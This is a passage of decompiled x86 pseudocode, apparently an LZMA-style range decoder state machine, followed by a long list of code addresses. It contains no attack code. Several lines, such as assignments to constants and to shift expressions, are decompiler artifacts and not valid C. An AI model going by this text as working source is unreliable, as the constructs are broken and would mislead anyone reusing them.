														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406d13
0x00406d13
0x00406d17
0x00406d24
0x00406d2e
0x00000000
0x00406d19
0x00406d19
0x00406d54
0x00406d57
0x00406d5a
0x00406d5d
0x00406d5d
0x00406d60
0x00406d67
0x00406d6c
0x00406c4d
0x00406c50
0x00406fc2
0x00406fc2
0x00406fc2
0x00406fc5
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x00407011
0x00000000
0x00000000
0x00407013
0x00407017
0x004071c6
0x004071dc
0x004071e4
0x004071eb
0x004071ed
0x004071f4
0x004071f8
0x004071f8
0x00407023
0x0040702a
0x00407032
0x00407035
0x00407038
0x00407038
0x0040703e
0x0040703e
0x004067da
0x004067da
0x004067da
0x004067e3
0x00000000
0x00000000
0x004067e9
0x00000000
0x004067f4
0x00000000
0x00000000
0x004067fd
0x00406800
0x00406803
0x00406807
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406812
0x00406813
0x00406816
0x00406818
0x00406819
0x0040681b
0x0040681e
0x00406823
0x00406828
0x00406831
0x00406844
0x00406847
0x00406853
0x0040687b
0x0040687d
0x0040688b
0x0040688b
0x0040688f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040687f
0x0040687f
0x00406882
0x00406883
0x00406883
0x00000000
0x0040687f
0x00406859
0x0040685e
0x0040685e
0x00406867
0x0040686f
0x00406872
0x00000000
0x00406878
0x00406878
0x00000000
0x00406878
0x00000000
0x00406895
0x00406895
0x00406899
0x00407145
0x00000000
0x00407145
0x004068a2
0x004068b2
0x004068b5
0x004068b8
0x004068b8
0x004068b8
0x004068bb
0x004068bf
0x00000000
0x00000000
0x004068c1
0x004068c7
0x004068f1
0x004068f7
0x004068fe
0x00000000
0x004068fe
0x004068cd
0x004068d0
0x004068d5
0x004068d5
0x004068e0
0x004068e8
0x004068eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406930
0x00406936
0x00406939
0x00406946
0x0040694e
0x00406fc2
0x00406fc2
0x00000000
0x00000000
0x00406905
0x00406905
0x00406909
0x00407154
0x00000000
0x00407154
0x00406915
0x00406920
0x00406920
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x00407011
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695b
0x004069cc
0x004069cf
0x004069d2
0x004069d9
0x004069e3
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00406fc2
0x0040695d
0x00406961
0x00406964
0x00406966
0x00406969
0x0040696c
0x0040696e
0x00406971
0x00406973
0x00406978
0x0040697b
0x0040697e
0x00406982
0x00406989
0x0040698c
0x00406993
0x00406997
0x0040699f
0x0040699f
0x0040699f
0x00406999
0x00406999
0x00406999
0x0040698e
0x0040698e
0x0040698e
0x004069a3
0x004069a6
0x004069c4
0x004069c6
0x00000000
0x004069a8
0x004069a8
0x004069ab
0x004069ae
0x004069b1
0x004069b3
0x004069b3
0x004069b3
0x004069b6
0x004069b9
0x004069bb
0x004069bc
0x004069bf
0x00000000
0x004069bf
0x00000000
0x00406bf5
0x00406bf9
0x00406c17
0x00406c1a
0x00406c21
0x00406c24
0x00406c27
0x00406c2a
0x00406c2d
0x00406c30
0x00406c32
0x00406c39
0x00406c3a
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c45
0x00406c4a
0x00000000
0x00406c4a
0x00406bfb
0x00406bfe
0x00406c01
0x00406c0b
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00000000
0x00406c5f
0x00406c63
0x00406c86
0x00406c89
0x00406c8c
0x00406c96
0x00406c65
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c7b
0x00406c7e
0x00406c7e
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00000000
0x00406ca2
0x00406ca6
0x00000000
0x00000000
0x00406cac
0x00406cb0
0x00000000
0x00000000
0x00406cb6
0x00406cb8
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d3a
0x00406d3e
0x00406d45
0x00406d48
0x00406d4b
0x00406d40
0x00406d40
0x00406d40
0x00406d4e
0x00406d51
0x00000000
0x00000000
0x00406dfa
0x00406dfa
0x00406dfe
0x0040719c
0x00000000
0x0040719c
0x00406e04
0x00406e07
0x00406e0a
0x00406e0e
0x00406e11
0x00406e17
0x00406e19
0x00406e19
0x00406e19
0x00406e1c
0x00406e1f
0x00000000
0x00000000
0x004069ef
0x004069ef
0x004069f3
0x00407160
0x00000000
0x00407160
0x004069f9
0x004069fc
0x004069ff
0x00406a03
0x00406a06
0x00406a0c
0x00406a0e
0x00406a0e
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a17
0x00406a1a
0x00000000
0x00000000
0x00406a20
0x00406a26
0x00000000
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x00406a33
0x00406a36
0x00406a39
0x00406a3c
0x00406a3d
0x00406a40
0x00406a42
0x00406a48
0x00406a4b
0x00406a4e
0x00406a51
0x00406a54
0x00406a57
0x00406a5a
0x00406a76
0x00406a79
0x00406a7c
0x00406a7f
0x00406a86
0x00406a8a
0x00406a8c
0x00406a90
0x00406a5c
0x00406a5c
0x00406a60
0x00406a68
0x00406a6d
0x00406a6f
0x00406a71
0x00406a71
0x00406a93
0x00406a9a
0x00406a9d
0x00000000
0x00406aa3
0x00000000
0x00406aa3
0x00000000
0x00406aa8
0x00406aa8
0x00406aac
0x0040716c
0x00000000
0x0040716c
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abc
0x00406abf
0x00406ac5
0x00406ac7
0x00406ac7
0x00406ac7
0x00406aca
0x00406acd
0x00406acd
0x00406acd
0x00406ad3
0x00000000
0x00000000
0x00406ad5
0x00406ad8
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae7
0x00406aea
0x00406aed
0x00406af0
0x00406af3
0x00406b0b
0x00406b0e
0x00406b11
0x00406b14
0x00406b14
0x00406b17
0x00406b1b
0x00406b1d
0x00406af5
0x00406af5
0x00406afd
0x00406b02
0x00406b04
0x00406b06
0x00406b06
0x00406b20
0x00406b27
0x00406b2a
0x00000000
0x00406b2c
0x00000000
0x00406b2c
0x00406b2a
0x00406b31
0x00406b31
0x00406b31
0x00406b31
0x00000000
0x00000000
0x00406b6c
0x00406b6c
0x00406b70
0x00407178
0x00000000
0x00407178
0x00406b76
0x00406b79
0x00406b7c
0x00406b80
0x00406b83
0x00406b89
0x00406b8b
0x00406b8b
0x00406b8b
0x00406b8e
0x00406b91
0x00406b91
0x00406b97
0x00406b35
0x00406b35
0x00406b38
0x00000000
0x00406b38
0x00406b99
0x00406b99
0x00406b9c
0x00406b9f
0x00406ba2
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb7
0x00406bcf
0x00406bd2
0x00406bd5
0x00406bd8
0x00406bd8
0x00406bdb
0x00406bdf
0x00406be1
0x00406bb9
0x00406bb9
0x00406bc1
0x00406bc6
0x00406bc8
0x00406bca
0x00406bca
0x00406be4
0x00406beb
0x00406bee
0x00000000
0x00406bf0
0x00000000
0x00406bf0
0x00000000
0x00406e7d
0x00406e7d
0x00406e81
0x004071a8
0x00000000
0x004071a8
0x00406e87
0x00406e8a
0x00406e8d
0x00406e91
0x00406e94
0x00406e9a
0x00406e9c
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f8c
0x00406f90
0x00406fb2
0x00406fb5
0x00406fbf
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00406fc2
0x00406f92
0x00406f95
0x00406f99
0x00406f9c
0x00406f9c
0x00406f9f
0x00000000
0x00000000
0x00407049
0x0040704d
0x0040706b
0x0040706b
0x0040706b
0x00407072
0x00407079
0x00407080
0x00407080
0x00000000
0x00407080
0x0040704f
0x00407052
0x00407055
0x00407058
0x0040705f
0x00406fa3
0x00406fa3
0x00406fa6
0x00000000
0x00000000
0x0040713a
0x0040713d
0x0040703e
0x00000000
0x00000000
0x00406d74
0x00406d76
0x00406d7d
0x00406d7e
0x00406d80
0x00406d83
0x00000000
0x00000000
0x00406d8b
0x00406d8e
0x00406d91
0x00406d93
0x00406d95
0x00406d95
0x00406d96
0x00406d99
0x00406da0
0x00406da3
0x00406db1
0x00000000
0x00000000
0x00407087
0x00407087
0x0040708a
0x00407091
0x00000000
0x00000000
0x00407096
0x00407096
0x0040709a
0x004071d2
0x00000000
0x004071d2
0x004070a0
0x004070a3
0x004070a6
0x004070aa
0x004070ad
0x004070b3
0x004070b5
0x004070b5
0x004070b5
0x004070b8
0x004070bb
0x004070bb
0x004070bb
0x004070bb
0x004070be
0x004070be
0x004070c2
0x00407122
0x00407125
0x0040712a
0x0040712b
0x0040712d
0x0040712f
0x00407132
0x0040703e
0x0040703e
0x00000000
0x00407044
0x0040703e
0x004070c4
0x004070ca
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e5
0x004070fe
0x00407101
0x00407104
0x00407107
0x0040710b
0x0040710d
0x0040710d
0x0040710e
0x00407111
0x004070e7
0x004070e7
0x004070ef
0x004070f4
0x004070f6
0x004070f9
0x004070f9
0x00407114
0x0040711b
0x00000000
0x0040711d
0x00000000
0x0040711d
0x00000000
0x00406db9
0x00406dbc
0x00406df2
0x00406f22
0x00406f22
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f28
0x00406f2a
0x004071b4
0x00000000
0x004071b4
0x00406f30
0x00406f33
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f40
0x00406f40
0x00406f40
0x00000000
0x00406f40
0x00406dbe
0x00406dc0
0x00406dc2
0x00406dc4
0x00406dc7
0x00406dc8
0x00406dca
0x00406dcc
0x00406dcf
0x00406dd2
0x00406de8
0x00406ded
0x00406e25
0x00406e25
0x00406e29
0x00406e55
0x00406e57
0x00406e5e
0x00406e61
0x00406e64
0x00406e64
0x00406e69
0x00406e69
0x00406e6b
0x00406e6e
0x00406e75
0x00406e78
0x00406ea5
0x00406ea5
0x00406ea8
0x00406eab
0x00406f1f
0x00406f1f
0x00406f1f
0x00000000
0x00406f1f
0x00406ead
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec8
0x00406ecb
0x00406ece
0x00406ee7
0x00406ee9
0x00406eec
0x00406eed
0x00406ef0
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406efc
0x00406efe
0x00406f01
0x00406f05
0x00406f07
0x00406f07
0x00406f08
0x00406f0b
0x00406f0e
0x00406ed0
0x00406ed0
0x00406ed8
0x00406edd
0x00406edf
0x00406ee2
0x00406ee2
0x00406f11
0x00406f18
0x00406ea2
0x00406ea2
0x00406ea2
0x00406ea2
0x00000000
0x00406f1a
0x00000000
0x00406f1a
0x00406f18
0x00406e2b
0x00406e2e
0x00406e30
0x00406e33
0x00406e36
0x00406e39
0x00406e3b
0x00406e3e
0x00406e41
0x00406e41
0x00406e44
0x00406e44
0x00406e47
0x00406e4e
0x00406e22
0x00406e22
0x00406e22
0x00406e22
0x00000000
0x00406e50
0x00000000
0x00406e50
0x00406e4e
0x00406dd4
0x00406dd7
0x00406dd9
0x00406ddc
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407184
0x00000000
0x00407184
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b51
0x00406b54
0x00406b57
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b64
0x00406b64
0x00406b64
0x00000000
0x00000000
0x00406cc6
0x00406cc6
0x00406cca
0x00407190
0x00000000
0x00407190
0x00406cd0
0x00406cd3
0x00406cd6
0x00406cd9
0x00406cdb
0x00406cdb
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce7
0x00406cea
0x00406ced
0x00406cee
0x00406cf0
0x00406cf0
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cfc
0x00406cfc
0x00406cff
0x00406d01
0x00406d01
0x00000000
0x00000000
0x00406f43
0x00406f43
0x00406f43
0x00406f47
0x00000000
0x00000000
0x00406f4d
0x00406f50
0x00406f53
0x00406f56
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5e
0x00406f61
0x00406f64
0x00406f67
0x00406f6a
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00406f70
0x00406f73
0x00406f76
0x00406f79
0x00406f7c
